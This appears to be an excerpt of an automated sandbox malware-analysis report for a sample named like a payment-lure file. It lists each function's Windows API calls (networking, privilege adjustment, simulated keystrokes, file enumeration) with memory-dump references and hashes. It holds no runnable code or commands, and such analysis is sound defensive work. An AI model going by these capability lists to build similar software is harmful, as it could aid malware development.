                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002C13DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($,23$<23$|
                                                                  • API String ID: 1659193697-124797785
                                                                  • Opcode ID: 4686719b41e49ded1af9b810cae7c2637c55620b058aca99eef9b61464e1f742
                                                                  • Instruction ID: d4588483435461ccafb85ea61da68a79de54d2973c42ff6744a2e8cd7def7918
                                                                  • Opcode Fuzzy Hash: 4686719b41e49ded1af9b810cae7c2637c55620b058aca99eef9b61464e1f742
                                                                  • Instruction Fuzzy Hash: 47322675A106059FD728CF29C481E6AB7F0FF49320B11C56EE59ADB3A2E770E961CB40
                                                                  Function 002D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 002D9296
                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 002D92B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  • Opcode ID: c0535d779343fbf5ce5f699610e5d5069f7fa9e5e55a2a3f8201de67416ea369
                                                                  • Instruction ID: b0c3287767b3ed06a938d2f636837441569565de67039cdb8a8c7ac16e5dfa2a
                                                                  • Opcode Fuzzy Hash: c0535d779343fbf5ce5f699610e5d5069f7fa9e5e55a2a3f8201de67416ea369
                                                                  • Instruction Fuzzy Hash: 3541DD70610200AFDB10BF68CC96E7E77EDEF44728F14844AF916AB3C2CA749D618B91
                                                                  Function 002CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CEB8A
                                                                  • _wcscmp.LIBCMT ref: 002CEBBA
                                                                  • _wcscmp.LIBCMT ref: 002CEBCF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002CEBE0
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002CEC0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  • Opcode ID: 0c16644ddcf902236683ed55e98b5ca3b1b8d2c0aa69c300cfb8b129a10ca7fb
                                                                  • Instruction ID: 4c1c7dd6251d2e1507cc353a3a016dba1d210616e79553193cfdcc32943c7f68
                                                                  • Opcode Fuzzy Hash: 0c16644ddcf902236683ed55e98b5ca3b1b8d2c0aa69c300cfb8b129a10ca7fb
                                                                  • Instruction Fuzzy Hash: FE41AF35610202DFCB08DF68C491EAAB7E8FF49324F10465EE95A8B3A1DB31E964CF51
                                                                  Function 002E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: fc7a64ccc073be3f1b6e8fbe9af368de3dc049b5f7061eab1baa4058b197f51d
                                                                  • Instruction ID: d81f48f7078d526496d88b293cae0f13aebfc914318be3207261abd2fc28c29b
                                                                  • Opcode Fuzzy Hash: fc7a64ccc073be3f1b6e8fbe9af368de3dc049b5f7061eab1baa4058b197f51d
                                                                  • Instruction Fuzzy Hash: C3119031351251AFEB226F66DC54A6E779CEF44760F45042AF88DDB281CF70D9228AA4
                                                                  Function 0029E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0029E014,76230AE0,0029DEF1,0031DC38,?,?), ref: 0029E02C
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0029E03E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  • Opcode ID: 7b1ea0cfcfe4923746ebee0103b48f6a9d836fe0e13d398b4413c3e2491861a9
                                                                  • Instruction ID: 1ca6268c2eb4761278fc5c05bca74cdf6aeb95ab1fa847b0e3b0ad23e13dbdb9
                                                                  • Opcode Fuzzy Hash: 7b1ea0cfcfe4923746ebee0103b48f6a9d836fe0e13d398b4413c3e2491861a9
                                                                  • Instruction Fuzzy Hash: A6D0A7304107139FCF379FA1EC4965376D9AF04301F19841AE486E2150FBB8C8808650
                                                                  Function 0029B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0029B22F
                                                                    • Part of subcall function 0029B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0029B5A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Proc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 2749884682-0
                                                                  • Opcode ID: e4408df98be4da8d967cbba8d54f564fed8a6f453d23c5632242e15491dc56cb
                                                                  • Instruction ID: 0aeae44f870ced6f9d0b1b7cab024360777a3688259245b7ff5b69f1c0e99630
                                                                  • Opcode Fuzzy Hash: e4408df98be4da8d967cbba8d54f564fed8a6f453d23c5632242e15491dc56cb
                                                                  • Instruction Fuzzy Hash: 14A1BC7053410ABADF3BAF2A7E88D7F695DEB42780F51012EFD09D61A1CB549C309672
                                                                  Function 002D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002D43BF,00000000), ref: 002D4FA6
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002D4FD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: a32a49eee9d909b6a140ecf034ff798983d9cf2f4a141a4cdb417e0ea130b12e
                                                                  • Instruction ID: 5ef6d46b4c3a9421837f3cc785974644000b68d4c2e9aa7f427877f354189471
                                                                  • Opcode Fuzzy Hash: a32a49eee9d909b6a140ecf034ff798983d9cf2f4a141a4cdb417e0ea130b12e
                                                                  • Instruction Fuzzy Hash: 4241F97152420ABFEB21DF84CC85FBF77BCEB40755F10402FF605A6291DAB19E519AA0
                                                                  Function 002877B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \Q3
                                                                  • API String ID: 4104443479-2258043845
                                                                  • Opcode ID: c117473a6de103950bea198c423d4822e4fbe99fa9d87414077ed3493b9b3a00
                                                                  • Instruction ID: cda14a5fcffafd469b7d0db7aa1caf5c7ce7014e2ce5d4f876d3b7b2ce2ff2aa
                                                                  • Opcode Fuzzy Hash: c117473a6de103950bea198c423d4822e4fbe99fa9d87414077ed3493b9b3a00
                                                                  • Instruction Fuzzy Hash: F5A25B7491621ACFCB28DF58C8907ADBBB1FF48314F2581A9D859AB390D7709E91DF80
                                                                  Function 002CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CE20D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002CE267
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002CE2B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  • Opcode ID: af0a84756fe1ffabf70f580a639b78eb3b3eb8438e352cfa3528a307698ef860
                                                                  • Instruction ID: e80b6dbb3c1d1d450762379795cba0366e7776d33651d433e872283b186f6ec2
                                                                  • Opcode Fuzzy Hash: af0a84756fe1ffabf70f580a639b78eb3b3eb8438e352cfa3528a307698ef860
                                                                  • Instruction Fuzzy Hash: 42215935A10218EFCB00EFA5D895EADFBF8FF48314F1584AAE906AB251DB319915CF50
                                                                  Function 002BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                  • GetLastError.KERNEL32 ref: 002BB1BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: f3120c01d94cdeae2c1814b4ec0a0600b8c9b92008cb63252d8d99942c67c338
                                                                  • Instruction ID: 5810f35f23e22bc9df4e4349fbfccc41d6be0b9588b9139405fe19a5eec6b6ba
                                                                  • Opcode Fuzzy Hash: f3120c01d94cdeae2c1814b4ec0a0600b8c9b92008cb63252d8d99942c67c338
                                                                  • Instruction Fuzzy Hash: 9C11BFB1420205AFE7189F58DC95D6BB7ECFB44350B20852EE05A93240EBB0FC518B60
                                                                  Function 002C6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C6623
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002C6664
                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C666F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 33631002-0
                                                                  • Opcode ID: beed37544938f56b40bb9bec4c66cc9c7cba6c9810e36dc5cceba482872354ab
                                                                  • Instruction ID: f079867694c6b51169833017c2ea2ff02057e8a28fc7e44b54d69f885c897245
                                                                  • Opcode Fuzzy Hash: beed37544938f56b40bb9bec4c66cc9c7cba6c9810e36dc5cceba482872354ab
                                                                  • Instruction Fuzzy Hash: C3115E71E11228BFDB118FA4DC45FAEBBFCEB49B10F104266F910E7290D7B05A018BA5
                                                                  Function 002C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002C7223
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002C723A
                                                                  • FreeSid.ADVAPI32(?), ref: 002C724A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: caa902ca2e65f5d58d38ff11c0b2d7d130301904d25a823588919feefab7f4cc
                                                                  • Instruction ID: 26d043aa98ace9f010cd0ba4a0afdfe20f528f03c078559c4f5aa97de3f3d636
                                                                  • Opcode Fuzzy Hash: caa902ca2e65f5d58d38ff11c0b2d7d130301904d25a823588919feefab7f4cc
                                                                  • Instruction Fuzzy Hash: 90F01D76A15209BFDF05DFE4DD99EEEBBFCEF08301F10446AA606E2191E2709A448B10
                                                                  Function 002CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CF599
                                                                  • FindClose.KERNEL32(00000000), ref: 002CF5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: b9176824f9d93fb090db1d85a954780ce312fea38fff1bee4d1d3746154d0e46
                                                                  • Instruction ID: ae3afe59346122e0eeb61517452cf1f50a5fe6b6d6197cafb6c9c1b030d46aa7
                                                                  • Opcode Fuzzy Hash: b9176824f9d93fb090db1d85a954780ce312fea38fff1bee4d1d3746154d0e46
                                                                  • Instruction Fuzzy Hash: 6911A5316106009FD700EF28D845A2EB3E9FF84324F00851EF965D7291DB30E9148F81
                                                                  Function 002CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002DBE6A,?,?,00000000,?), ref: 002CCEA7
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002DBE6A,?,?,00000000,?), ref: 002CCEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 45ebead886da2ff41a72235d429a842e81257c31fb0b5f06aecb7705294ba03a
                                                                  • Instruction ID: d7f1a29c9c0528ce0bc4adee61eabfa4beea329d19a59bcf195e8089308d6961
                                                                  • Opcode Fuzzy Hash: 45ebead886da2ff41a72235d429a842e81257c31fb0b5f06aecb7705294ba03a
                                                                  • Instruction Fuzzy Hash: 5EF08235111229ABDB10AFA4DC49FEA77ADBF09351F004166F919D6181D7709A50CBA4
                                                                  Function 002C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002C4153
                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 002C4166
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InputSendkeybd_event
                                                                  • String ID:
                                                                  • API String ID: 3536248340-0
                                                                  • Opcode ID: 13317a0bafccaf50d9bd2d2de3c0195638bd7c358b1df017427ed79a7254b71a
                                                                  • Instruction ID: f1baae883bb7ae704491bc6e36a850379b2d6097c2ec56e3c837b4cd5983a486
                                                                  • Opcode Fuzzy Hash: 13317a0bafccaf50d9bd2d2de3c0195638bd7c358b1df017427ed79a7254b71a
                                                                  • Instruction Fuzzy Hash: DDF0677081024EAFDB069FA0CC15BBE7FB4EF00305F04800AF966A6192D7B986129FA0
                                                                  Function 002BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002BACC0), ref: 002BAB99
                                                                  • CloseHandle.KERNEL32(?,?,002BACC0), ref: 002BABAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 904d856231f7cc451c8f7162e2520e2a604183ec0ecfa367ab39df9f71d8b19b
                                                                  • Instruction ID: 330b4a95fbcd2d27c68f91fb81409627bc444ec2162a0e53edac6e24e2679a64
                                                                  • Opcode Fuzzy Hash: 904d856231f7cc451c8f7162e2520e2a604183ec0ecfa367ab39df9f71d8b19b
                                                                  • Instruction Fuzzy Hash: ECE0E675010511AFEB662F54FD05D777BEDEF04320B11C569F49AC1470DB625CA0DB50
                                                                  Function 002A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,002A6DB3,-0000031A,?,?,00000001), ref: 002A81B1
